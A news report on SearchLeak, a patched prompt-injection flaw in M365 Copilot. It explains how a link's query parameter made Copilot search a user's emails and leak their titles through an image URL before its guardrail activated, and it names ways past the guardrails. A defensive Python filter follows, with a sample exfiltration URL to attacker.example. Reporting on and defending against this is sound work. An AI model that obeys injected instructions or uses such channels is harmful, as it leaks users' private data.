Microsoft has patched a critical vulnerability in its M365 Copilot AI platform after researchers showed how it could be exploited to steal 2FA codes and other sensitive data from emails. Their proof-of-concept attack bypassed Copilot's security guardrails, letting attackers exfiltrate data with no user interaction beyond a single click on a link. The vulnerability, given the maximum severity rating of critical, highlights the ongoing challenge of securing AI-driven systems against malicious commands.

The attack, dubbed SearchLeak, relied on a technique called Parameter-to-Prompt Injection, in which an attacker sends the victim a URL whose query parameter triggers Copilot’s search functionality. The injected command instructed Copilot to search the user’s emails, extract their titles, and embed them in an image URL. Once the victim clicked the link, Copilot executed the command with no further user input. Researchers noted that Copilot’s guardrail, which wraps output in blocks, activated only after the 'thinking' phase, so the image request left the browser before the protection kicked in.
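
To make the exfiltration channel concrete, here is a minimal defensive sketch in Python. It is not Microsoft's fix, and nothing in it comes from the researchers' write-up: the function names, the `TRUSTED_IMAGE_HOSTS` allowlist, and the example hosts are all hypothetical. It assumes an assistant's output is available as a complete string before anything is rendered, and it removes image references that point to hosts outside the allowlist, since rendering such an image is what sends the embedded data to the attacker's server.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist; a real deployment would define its own trusted hosts.
TRUSTED_IMAGE_HOSTS = {"images.example.com"}

# Markdown image syntax: ![alt](url "optional title")
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")
# Raw HTML image tags, removed unconditionally in this sketch.
HTML_IMAGE = re.compile(r"<img\b[^>]*>", re.IGNORECASE)


def is_trusted(url: str) -> bool:
    """Return True only if the URL's host is on the allowlist."""
    host = urlparse(url).hostname or ""
    return host.lower() in TRUSTED_IMAGE_HOSTS


def strip_untrusted_images(text: str) -> str:
    """Replace image references to non-allowlisted hosts with a placeholder."""

    def replace_md(match: re.Match) -> str:
        url = match.group(2)
        return match.group(0) if is_trusted(url) else "[image removed]"

    text = MD_IMAGE.sub(replace_md, text)
    return HTML_IMAGE.sub("[image removed]", text)


# Example: email titles smuggled out through an image URL's query string.
leaky = "Done. ![x](https://attacker.example/p.png?d=Your%20code%20is%20123456)"
print(strip_untrusted_images(leaky))
```

The timing matters as much as the filter itself. As the researchers' observation suggests, a check like this only helps if it runs on every piece of output before the browser can act on it, including anything emitted during an intermediate phase.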

Microsoft and other LLM providers have struggled to stop their models from complying with malicious requests to reveal data. The root cause is that AI bots cannot distinguish between instructions from the user and instructions embedded in the third-party content they summarize or act on. Guardrails, such as restricting access to untrusted sites, are designed to mitigate the risk, but attackers easily circumvent them with workarounds such as markup language or using Bing as a trampoline. Varonis researchers noted that the exploit could access emails, meeting invites, notes, and other business content, and potentially more, depending on how M365 is integrated.

Source: arstechnica